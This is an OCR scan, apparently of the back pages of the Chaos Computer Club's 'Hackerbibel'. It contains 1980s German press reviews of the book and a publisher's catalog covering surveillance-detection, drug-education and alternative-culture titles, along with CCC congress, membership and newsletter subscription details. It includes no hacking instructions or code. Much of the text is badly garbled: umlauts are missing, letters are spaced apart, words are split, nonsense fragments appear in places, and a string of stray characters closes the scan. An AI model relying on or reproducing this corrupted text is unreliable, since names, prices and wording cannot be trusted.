C C C - das Ist kein unbekanntes Krcel eines Insiderkreises mehr, seit Herwart Holland und sein Chaos-Computer-Club" Im letzten Jahr die H a m b u r g e r Sparkasse mittels Btx ber N a c h t u m sale 135 000 D M erleichtert hatte. Das Schlagwort vom R o b i n Hood im Datennetz" m a c h t e damals allerorten die R u n d e . Der C h a o s C o m p u t e r Club, Schwarz-Schillings unbequemstes Kind, das atypisches Nutzverhalten" a n den T a g bzw. die Nacht legt, wurde vor vier Jahren in den R u m e n der T A Z gegrndet. Die Aktivitten der galaktisehen Vereinigung o h n e feste Strukturen" (CCC ber sich selbst) wie e t w a die Verbreitung von Bauanleitungen bzw. Baustzen von M o d e m s , Strichcodelesern u.., die Grndung von Datenbanken, der Zugriff und die Verknpfung von Rechnernetzen, die Internationale Z u s a m menarbeit mit Computernetzwerken sowie die H e r a u s g a b e der Zeitschrift Die D a t e n s c h l e u der" haben diesem lockeren Verein wenig S y m p a t h i e n bei Computerfirmen wie bei der Post eingetragen. Dabei ist das von der G r n e n Kraft Medienexperimente" verlegte Buch nicht nur fr j e n e Zeitgenossen interessant, die Ihren Farblernseher In ein HlghTech-Termlnal-Tabernakel verwandelt haben und die W e l t a u s Immer rot unterlaufenen, bernchtigten Pupillen b e t r a c h t e n ,

sondern es ist a u c h fr d e n Interessierten, a b e r ' a h n u n g s l o s e n L a i e n Informativ. Dies liegt an der K o n z e p t i o n d e s Buches als e i n e r s e i t s umf a n g r e i c h e S a m m l u n g von Baua n l e i t u n g e n fr M o d e m s , Schaltplnen, Funkdienst- und a n d e r e n Verzeichnissen (Serial-NormNummern) sowie Hacker-Tips" allgemeinerer Art. A n die heranzukommen ist normalerweise sehr schwer, weil sich der H a c k e r - A l l t a g meist an der Grenze der Legalt b e w e g t . Andererseits ist d a s Buch a u c h eine D o k u m e n t a t i o n der G e s c h i c h t e des H a c k i n g s " , die sich a u s Artikeln v e r s c h i e d e n e r Z e i t u n g e n , a u s Kongressbericht e n und aus A u f s t z e n mit T h e m ne wie e t w a C o m p u t e r fr Nicaragua", Computerkriminalitt, C o m p u t e r & the T o t a l i t a r i a n S t a t e " u.a. m e h r p u z z l e a r t i g zus a m m e n s e t z e n lt. D a s B u c h zeigt d a m i t a u c h d e m nur" politisch interessiert e n die G e f a h r e n und Mglichkeiten der n e u e n T e c h n o l o g i e n . Der C C C zeigt mit seiner praktis c h e n Arbeit, w i e m a n d e n berw a c h u n g s s t a a t mit s e i n e n eigenen M i t t e l n s c h l a g e n kann. Die H a c k e r b i b e l Teil II ist schon In der M a c h e ; w e r Lust hat, sich d a r a n zu beteiligen, k a n n seine T i p s und Tricks mit Btx" (auch a n o n y m ) an d a s Chaos-Team schicken: CCC, S c h w e n c k e s t r a e 85, 2 0 0 0 H a m burg. Die H a c k e r b l b e l , C h a o s C o m p u ter Club, V e r l a g Grne KraMedienexperimente, 260 S., 33,33 D M

Auf der Buchmesse habe ich es entdeckt: Das erste Buch vom Chaos Computer Club (CCC). Natrlich bers Hacken. Den CCC brauche ich wohl kaum vorzustellen, selbst Neulinge drften schon irgendwann einmal von ihm gehrt haben, sptestens durch den spektakulren "Einbruch" in die BTX-Leitung einer Bank. Vier Jahre CCC-Geschichte, Erfahrungen u n d Aktivitten sind in diesem witzig aufgemachten Buch enthalten. Gem der CCC-Maxime "jeder sollte unzensieit Informationen austauschen knnen" beinhaltet die HACKERBIBEL Zeitungsausschnitte, Reportagen, Bauanleitungen, Cartoons und Faksimiles von Zeitschriften aus der Welt des Hakking. Eine bunte Mischung geballter Informationen, allerdings unbersichtlich und teilweise recht schwer leserlich; vor allem, w e n n m a n dei englischen Sprache nicht mchtig ist. Eine Menge wichtiger Artikel u n d Faksimiles sind aus der englischen Originalausgabe abgedruckt.

CHAOS-COMPUTERC L U B (Hrsg.) D i e Hackcrbibcl (Der Brne 7.iulf 98. 257 Sellin. DM 35.50 AS z e i c h n e ! e i n e SubK u l t u r aus? D a sie e i n e Code-Sprache spricht, die nicht jeder versieht. Was zeichnet die Bibel aus? M a n m u dran glauben . . . In unseren an k o n l u r i e r l e n Revolten a r m e n Z e i t e n ist das Bedrfnis nach a u f s t n d i s c h e n H e l d e n gro. A b e r alle lieben G r e e n p e a c e . B l e i b e n n u r die Hacker: S c h l i e l i c h f u m m e l n sie fr u n s d i g i t a l e A n a l p h a b e ten in den C h i p s der M c h t i gen h e r u m . N u n hat der d u r c h das Knacken von Sparkttssenkennwrtern b e r h m t g e w o r d e n e Hamburger Chaos-ComputerC l u b seine rette H a c k e r b i b e l " verlegen lassen. W o r u m es den Hackern geht? U m freien Zugang zu allen D a t e n " . Hier wird es -amsantbrisant. D e n n dieser Standpunkt widerspricht kontrr der Lieber-nicht-l I alt u n g kritischer u n d alternativer P r o v i n l e n z . Die siihe nur zu gern massive V o r h n g e s c h l s s e r im den Dat e n b a n k e n u n d verlagert rnil D a t e n s c h u t z u n d Technikskcp-

sis auch das letzte Q u a n t u m V e r a n t w o r t u n g z u den BitsTcchnokraten. Die Hacker wissen das. U n d so rgern sie n i c h t n u r Post u n d S i e m e n s , s o n d e r n auch die unbedarfte Scene". W e r als Laie dus B u c h s i c h t e t , wird es nicht k a u f e n . b e r zwei D r i t t e l bestehen aus F a c h t i p s u n d Tricks z u m L t e n u n d C o d i e r e n . Es w i m m e l t von E x p e r t e n k r z e l n , eine S p r a c h e , d i e n u r Hacker u n d ihre i n t i m e n F e i n d e a u f der a n d e r e n Seite des M o n i tors v e r s t e h e n . D e r K a m p f u m die V e r f g u n g s g e w a l t b e r die n e u e T e c h n o l o g i e Ist n i c h t fr jeden berschaubar. E r s t a u n l i c h e r w e i s e sind die iisthetischen F o r m e n j e d o c h Iradierl: aus A l t e r n a t i v z e i t u n gen der ersten Generation, kreuz u n d q u e r l a y o u l e t C h a o s k o m p l e t t . U n d fast die H l f t e ist in E n g l i s c h . T r o t z d e m sind viele Erklrungen zu dieser M i s c h u n g a u s Spontanitt. Hi-Tech-Obsessionen u n d K o m m u n i k a t l o n s gedusel b r a u c h b a r . Z u r Selbst i n t e r p r t a t i o n b e d i e n t sich d i e bleiche u n d clwtis d i s k u r s a r m e S z e n e a l l e r d i n g s bei d e r m q r -

UMPO/DEZEMBtR 1985

Medienexperimente D-6941 Lhrbach


Chaos Computer Club & AK Politischer Computerei n3atz

DIE STUDIE
Dar Ortin Zweig 117 Entwurf einer sozialvertrglichen Gestaltungsalternative fur den geplanten Computereinsatz der Fraktion Die Grnen im Bundestag" unter besonderer Bercksichtigung des geplanten Modellversuchs der Bundestags Verwaltung (PARLAKOM). Auf dei Basis eines Im Auftrag des Bundestages erstellten umfangreichen Planungskonzepts zur Einfhrung eines gemeinsamen Informations- und Kommunikationssystems fr das Parlament, die Fraktionen und die Wahlkreisbros der Abgeordneten galt es, dieses kritisch zu bewerten und die Gestaltungsmglichkeiten fr die Grnen im Bundestag auszuarbeiten... Die Einfhrung der Computertechnik gestaltet sich fr die Grnen im Bundestag so schwer wie fr andere der Ausstieg aus der Atomindustrie. Fr beide geht es an die Strukturen. TEMPO zur Studie: Die berchtigste Hacker-Gang der Republik, der Hamburger Chaos-Computer-Club, versetzte bislang nur Big Brother In Angst und Schtecken. Jetzt sind die Alternativen dran: CCC will die Bundestagsfraktion der Grnen verkabeln..."

LOOMPANICS
The Best Book Catalog In the World Dar Grne Zweig 99 Der definitive Katalog fr den subversiven Alitag (taz) This catalog is an important source for anarchists, survivalists, iconoclasts, self-liberators, mercenaries, investigators, drop-outs, researchers, and just about anyone interested in the strange, the useful, the arcane, the oddball, the unusual, the unique, and the diabolical Eine unglaubliche Anpreisung von Bchern, die aus verschiedensten Grnden hierzulande nicht vorstellbar ist. Achtung: Wir verteilen nur den Katalog, nicht die dort angebotenen Bcher, diese mu Vnan direkt in den USA bestellen. Katalog A4, broschiert. 150 Seiten, 5 . - DM/SFR

Jochen Blumenthal

DER ELEKTRONISCHE KAMMERJGER


Erkennung von Wanzen, Spitzeln und berwachung, sowie Tips fr Schutzmanahmen Der Grne Zweig 122 Gibt es Grnde, sich in diesem Land verfolgt zu fhlen? Wert Telefone abgehrt? Schlsser und Codes geknackt? Wenn ja, woran kann man die Spitzel und ihre Wanzen erkenn was dagegen unternehmen? Jochen Blumenthal hat sich die Mhe gemacht, Bespitzelur mglichkeiten auszuloten und in einer auch fr den techniscl Laien verstndlichen Sprache zu erklren. Blumenthal, Autor i Bcher Das Groe Minispion Baubuch und Computer und Abi ren, ist ein Betroffener, hat man ihm doch bel mitgespielt: mi rere Razzien und Knastaufenthalte motivierten ihn zur grndlict Recherche. Es geht mir darum. Mglichkeiten und Methoden zeigen und wie man sich dagegen wehren bzw. ihre Anwendu wesentlich erschweren kann." Die Themen reichen von Kommentaren zum neuen Fernmelde; lagengesetz ber (humane) Erklrungen der Hochfrequenz" I hin zu Wanzenerklrungen und -verstecken. Als Zugabe gibt noch Tips zur Chiffrierung persnlichster Daten.

Ronald Rippchen

HEITER WEITER
Die gesammelten Kruter-Pillen-DrogenKolumnen aus der taz Der Grne Zweig 119

ISBN 3-925817-17-4

7.50 DM/SFB

64 Wochen lang fllte Sachbuchaulor R, Rippchen seine Drogenbezogene Kolumne In der tageszeilung. Die einzige Drogenko- ISBN 3-925817-22-0 lumne in einer Tageszeilung weltweit - die lngste Kolumne in der Geschichte der !az. In diesem Bchlein sind nun jene Kolumnen vollstndig dokumentiert. Dazu auch bislang unverffentlichte Texte von Mr. Rippchen und anderen zum Thema. Das Ganze auch noch heftig illustriert. Inhalt: Kiffer-Fabeln Tiere und Drogen Krieg dem Rauschgift Designer Drogen Dope im Ostblock MDMA, die Droge des Jahres Suchtstoffkommission der UN Leserfeedback Weiterfhrende Buchtips Musiktips fr psychedelische Reisen. TRAU KEINEM COMPUTER,
DEN OU NfCKT (ER-) TRAGEN KANNST.

70 Selten

10 DM/S

immune, '

msmissBud

nutiung, tmomsl niNscmicm timi


V I O f ' KAiPr.'

Der Autor mag weder Heroin noch Appelwoi, Kokain oder Schnaps. Daher werden solche Stoffe auch in diesem Buch gemieden. Es geht um Aufklrung ber psychedelische Drogen weder eine Verherrlichung, noch eine Verteufelung - und um zeitgerechte Infos ber Haschisch, MDMA, LSD und Artverwandtes. .Was fr ein wundervolles Buch! Ich bewundere Ronald Rippchen, er ist ein glnzendes Beispiel eines Kyber-Heros. Ich bin glcklich, da wir Freunde sind und zusammen 'fliegen'", meint Altmeister Timothy Leary zum Inhalt dieses Buches. In der Tat! ISBN 3-925817-19-0 Nicholas Albery 100 Seiten 10 DM/SFR

^lO FICTION
Der Grne Zweig 82 14 Geschichten zum Thema ...als die Natur die Zukunft bernahm mit Beitrgen der besten Science Fiction Autoren: Frank Herbert, Ursula LeGuinn, Herbert W. Franke, Jean u.a.m. Zusammenstellung: Werner Pieper. ISBN 3-922708-82-X, 160 Seiten, nur noch 5 DM/SFR Ludmilla Ttlng (Hrsg.)

GENERALPROBE FR DAS JAHR 2000


Drogen, Hausbesetzer, Rechtsverdrehungen, Altornatlvsteuern, Liebe, Sekten, Visionen, Alternative Radio, Festivals und Mondenergie Der Grne Zweig 90 Drogen Religion Spinnereien Kommunen Uebe Visionen ... Nicholas Albery arbeitet wahrhaft alternativ: viel Maloche, viel Phantasie, viel Schlitzohrigkeit, viel Kommunikation & keine Kohle. Viele seiner Aktivitten in London frbten auch aul Deutschland ab: alternatives Steuersystem, Freistaat Frestonia, die ersten Globetrotterbcher, ja auch die GRNEN ZWEIGE sind von Impulsen Albery's beseelt. bersetzt von Werner Pieper. Hunderte von Mglichkeiten angepriesen, wie man ohne eine mde Mark innerstdtisch schlafen, essen und umherschweifen knne. Als radikaler Robin Hood der Neuzeit, mit Milchpulver und Honig bewaffnet, reiste Nicholas Albery spter quer durch die internationale Landkommunen-Krischna-Szene, inszenierte Piratensender und Free Festivals und zog sich schlielich in einen original-britischen Pferdewagen zurck, mit dem er monatelang durch Wales kutschierte, um aul diesem ganz speziellen Trip seinen lngst flligen Hippie-Klassiker GENERALPROBE FR DAS JAHR 2000 zu schreiben ... Summa Summarum sind Alberys Erlebnisse ein Dokument, das nicht ganz so ausgeflippt ist wie die Freak-Brothers-Geschichten, dafr aber die deutsche APO-Generation um einiges an Ausgeflipptheit bertrifft." (tip 2/84) . Alberys Ideenquell scheint einfach nicht zu versiegen ... eine derart ausgeprgte Art des Konsumverzichts plus sozialer Aktivitten habe ich noch nicht erlebt." (taz) Nicholas Albory isl eine der zentralen Figuren in der Gcschichtn der englischen Alternativ-Bewegung. Albery selbst beschreibt sein Buch als einen .verblffenden Augenzeugenbericht der Geschichte der Alternativgesellschaft von 1968 bis 1975"." (aus: Peace News. London) 258 Seiten nur 9.B0 DM/SFR

Werner Pieper

DAS SCHEISSBUCH
Entstehung, Nutzung und Entsorgung Der Grne Zweig

MENSCHEN - BUME EROSIONEN


Kahlschlag im Himalaya - Wege aus der Zerstrung Der Grne Zweig 120 Weltweit geht es Bumen und Wldern zunehmend schlechter. Holztaubbau, Tourismus, Enetgiemiwirtschaft und Umweltverschmutzung schlagen ihre Breschen. Sei es der Raubbau in amerikanischen Regenwldern, der Ausverkauf afrikanischer Edelhlzer, rutschende Berge im Himalaya oder das Waldsterben bei uns: berall wchst der Widerstand der Betroffenen. In diesem Buch wird stellvertretend fr alle anderen die Situation der Menschen im Himalaya dokumentiert, wobei besonders auf die Chipko", die Baumumarmer, eingegangen wird. Themen: Die Wlder tm Himalaya Die Chipko-Bewegung kologie-Bewegungen in Indien Bhutans radikale Umeltpolitik Hrt endlich auf, uns entwickeln zu wollen Die Legende von der Grnen Revolution Als die Tourislen kamen u.a.m. Die Autorin, Ludmilla Tting, lebt seit 1974 wechselweise in Kalhmandu (Nepal) und Kreuzberg (Berlin). Beides Orte, die sie gleichermaen faszinieren. Als engagierte Umweltjournalistin und eine der besten Kennerinnen Nepals st es ihr ein Anliegen, nicht nur Fakten und handfeste praktische Tips weiterzugeben, sie wirbt auch fr ein sanftes, einfhlsames Reisen", von ihr sind ungezhlte Zeitungsartikel erschienen. Weitere Bcher: Bikas/Binas, Kathmandu 1987, und Nepal und Tibet, 1986. I Dieses Buch entstand in Kooperation mit der Aktionsgemeinschaft Solidarische Welt (ASW), Berlin.
ISBN3-925H.7701

ECHT TZEND!
7 WARNUNGS-STICKER
Der Grn Zweig 114
lcuch

A T Z E N D GIFTIG REIZEND EXPI r w i w

T7Fwn

a<benen Aufklebe,

i u ,

VORS,CHT NSSE G E S U N D H T t s s C H D U C H ^ ^ 7 Aulklobe,._,uwmmen M o n r o e

140 Seiten

13 DM/SFR

c ^ c

Chaos Computer Club


eingetragener Verein f r

Chaos Communication Congress


Die Europische Hackerparty immer zwischen den Jahren am letzten Wochenende des Jahres Eideistedter Brgerhaus, Elbgaustrae 12, 2000 Hamburg 54 Das Treffen fr Datenreisende! Telefon, Datex, Btx, Telex, Mailboxbetrieb, Datenfunk, Videovorfhrung. Aktive Workshops, Video- & Papercopiers Eintritt: Mitglieder 20 Private Kongressteilnehmer 30 Presse 50 Gewerbliche Teilnehmer 100 DM DM DM DM

User, Hackerund Datenreisende


*LeitstelleeVa,Schwenckestr.85, D-2000 Hamburg20* D E R C H A O S C O M P U T E R C L U B S T E L L T SICH VOR A U F S E I T E 137 IN DIESER H A C K E R B I B E L - A L S O Z U R C K BLATTERN Mitgliedschaft kann in der Leitstelle eVa beantragt werden. Antrge w e r d e n fr Einzelpersonen oder Gruppen angenommen. Frdernde Mitglieder untersttzen den intergalaktischen Patrouillendienst am Rande der Unkenntlichkeit. Der CCC-lnformationsdienst wird aktiv, sobald Anmeldung und V-Scheck (oder Briefmarken) im Chaos-Dienst der Leitstelle eVa a n g e k o m m e n sind. Grere Frderabos vorher ankndigen, damit der C C C rechtzeitig reagieren kann.

Beitrge zur Frderung des CCC


cccVW 20 DM Aufnahmegebhr (einmalig fr Verwaltung) gewnschte Leitstellennummer: (*) Frderndes Mitglied bis 29.2.88 Normales Mitglied bis 29.2.88 Schler u. . bis 29.2.88 Schler u. . bis 31.8.87

cccF1 ab 230 DM cccN1 120 DM cccS1 60 D M cccSO 30 DM

naturgem portofrei und unverpackbar Chaos-Jahr endet mit Schaltjahr oder nicht.
(') Leitstellennummer umfat mind. 4 Ziffern. Stelle 1 + 2 istTel-Vorwahl HH 40, Berlin 30. Kiel 43 usw.. Wnsche werden nach Mglichkeit erfllt.

Voranmeldung durch berweisung auf Postgiro 551257/204 PschA Hamburg Sonderkonto C./S. Wernery

die Datenschleuder
Das wissenschaftliche Fachblatt fr Datenreisende /ff Ein Organ des Chaos Computer Club HH Redaktion Datenschleuder, Schwenkestr. 85, 2000 Hamburg 20, Redaktionstreff donnerstags 19 Uhr
.dsPE .3,80 DM | Probeexemplar ds - aktuell
L e b e n s a b o d s (wer o.was lebt lnger?)

Ein Abo bringt Unbekanntes fter!


dsL1 9 9 9 . 9 9 D M

,dsF1 ab 100 D M dsN1 60 D M ,dsS1 30 DM dsHO 60 D M

Frderabo 8 A u s g a b e n (Uahr) Jahresabo 8 A. Normalverdiener Sonderabo 8 A. nur Schler u.a.!!! Sonderabo und Hackerbibel Teil 1

dsPE - dsHO Jeweils incl. Porto/Vorp.

D A S N E U E T E S T A M E N T HRSG. CHAOS COMPUTER CLOR OER GRNE ZWEIG 124


Hacker sind keine vorbergehende Modeerscheinung wie Punks oder Juppies. Hacker sind eine feste Gre in einer menschlichen Zukunft. Seit dem Erscheinen von HACKER BIBEL 1 haben die Jungs vom Chaos Computer Club durch ihre Aktionen immer wieder die Schlagzeilen der Weltpresse erobert. In diesem Buch werden ihre Taten dokumentiert, hier klren sie den Leser ber ihre Motivationen auf: vom NASA Hack, ber die VirenGefahr, Netzwerk Hoffnungen und die Hacker Ethik.

AUS

UEM

INHALT:

RIE VOLLSTNDIGEN AUSGAREN PER 1 A T E H S C H L E H R E R , RR. I 3 - 2 S FAKSIMILIERT DOKUMENTATION OES VIREN FORUMS POETRONIC T A L K S DIE Z E I T DES I N D I A N E R S P I E L E N S I S T V O R R E I H A C K E R IN H A F T > D I E T E C H N I K IM MIE S C H R A N K E N W E I S E N STRAHLEHRE COMPUTER REALITY HACKERS UND C Y R E R P U R K S . . . A U F E U V - F A C H F R A U U M G E S C H U L T M E C A D R A I H M I T MI H I - M A S C H I H E H Z U R L A G E R E R H A T I U H IM G E T E I L T E R F I Z D E U T S C H L A N D S A T E L L I T E H UHR S C H S S E L H DATEH: AUFZUCHT & PFLEGE RATCH MAGIC GU S T U P GH K R E A T I V E S U H R K U H S T R U K T I V E S C H A O S EH M A S S E
UNTER DEN A B T N E N : D I V E I S E M I T G L I E D E R DES C H R I S C O M P D T E R C L U S S , 2 . 1 . S T E F F E N W E R N E R Y , R R . Wftl U.U.A.M. JISEPN WEI2ENIAIN PETEI I I A S E I MINNS IELTAT UM HARY P I E T R I N I C HANS GLISS DIETER SCHDMACHER MARIA N E F F - I T H I F F D E I I I A H BRECHER
32
6 7 7 7 I S B N M S 2 5 e i U < t l VJCOC 5 WPM T 1 5 S C C L 2 6 4 5 7 1 I:
n k

K&V
h * C f i E P c I E E L 2 . C I S

2 3 , 3 2

NtLfc

I i

SI4*M

C7CSS

12 S t

1 7 - 2 4 - 7

2 3 . 3 3

OM

S F R

2 t

SS

O t t l a r

Vous aimerez peut-être aussi